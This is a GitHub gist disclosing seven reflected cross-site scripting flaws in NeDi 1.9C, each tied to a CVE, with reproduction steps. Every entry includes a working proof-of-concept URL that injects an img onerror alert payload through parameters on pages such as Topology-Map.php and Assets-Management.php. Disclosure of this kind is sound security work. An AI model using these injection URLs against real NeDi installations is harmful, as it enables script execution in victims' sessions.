Skip to content

Instantly share code, notes, and snippets.

@p4nk4jv

p4nk4jv/NeDi 1.9C Multiple Cross-Site Script (XSS) Vulnerabilities

Last active Jul 3, 2020
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Raw
NeDi 1.9C Multiple Cross-Site Script (XSS) Vulnerabilities
Multiple Cross-Site Script Vulnerabilities found in NeDi 1.9C version.
Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "Topology-Map.php" page on "xo" parameter.
Steps To Reproduce:-
1. Login to the Application.
2. Go to "https://ip/Topology-Map.php" page.
3. Add 'xo' parameter at the end of the URL.
Example:- https://ip/Topology-Map.php?xo=<img src=x onerror=alert(document.domain)>
Reference: CVE-2020-15028
Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "Assets-Management.php" page on "sn" parameter.
Steps To Reproduce:-
1. Login to the Application.
2. Go to "https://ip/Assets-Management.php" page.
3. Add 'sn' parameter at the end of the URL.
Example:- https://ip/Assets-Management.php?st=10&sn="><img src=x onerror=alert(document.domain)>&an=&ty=&cl=&lo=&co=&ps=&pc=&pn=&pt=&ew=&es=&el=&ms=0&mp=&sl=&md=&mc=&sm=&em=&com=&lst=&val=&add=Add
Reference: CVE-2020-15029
Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "Topology-Routes.php" page on "rtr" parameter.
Steps To Reproduce:-
1. Login to the Application.
2. Go to "https://ip/Topology-Routes.php" page.
3. Add 'rtr' parameter at the end of the URL.
Example:- https://ip/Topology-Routes.php?rtr=<img src=x onerror=alert(document.domain)>
Reference: CVE-2020-15030
Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "Assets-Management.php" page on "chg" parameter.
Steps To Reproduce:-
1. Login to the Application.
2. Go to "https://ip/Assets-Management.php" page.
3. Add 'chg' parameter at the end of the URL.
Example:- https://ip/Assets-Management.php?chg=<img src=a onerror=alert(document.domain)>
Reference: CVE-2020-15031
Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "Monitoring-Incidents.php" page on "id" parameter.
Steps To Reproduce:-
1. Login to the Application.
2. Go to "https://ip/Monitoring-Incidents.php" page.
3. Add 'id' parameter at the end of the URL.
Example:- https://ip/Monitoring-Incidents.php?id="><img src=x onerror=alert(document.domain)>
Reference: CVE-2020-15032
Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "snmpget.php" page on "ip" parameter.
Steps To Reproduce:-
1. Login to the Application.
2. Go to "https://ip/snmpget.php" page.
3. Add 'ip' parameter at the end of the URL.
Example:- https://ip/snmpget.php?ip="><img src=x onerror=alert(document.domain)>
Reference: CVE-2020-15033
Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "Monitoring-Setup.php" page on "tet" parameter.
Steps To Reproduce:-
1. Login to the Application.
2. Go to "https://ip/Monitoring-Setup.php" page.
3. Add 'tet' parameter at the end of the URL.
Example:- https://ip/Monitoring-Setup.php?tet=<img src=x onerror=alert(document.domain)>
Reference: CVE-2020-15034
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment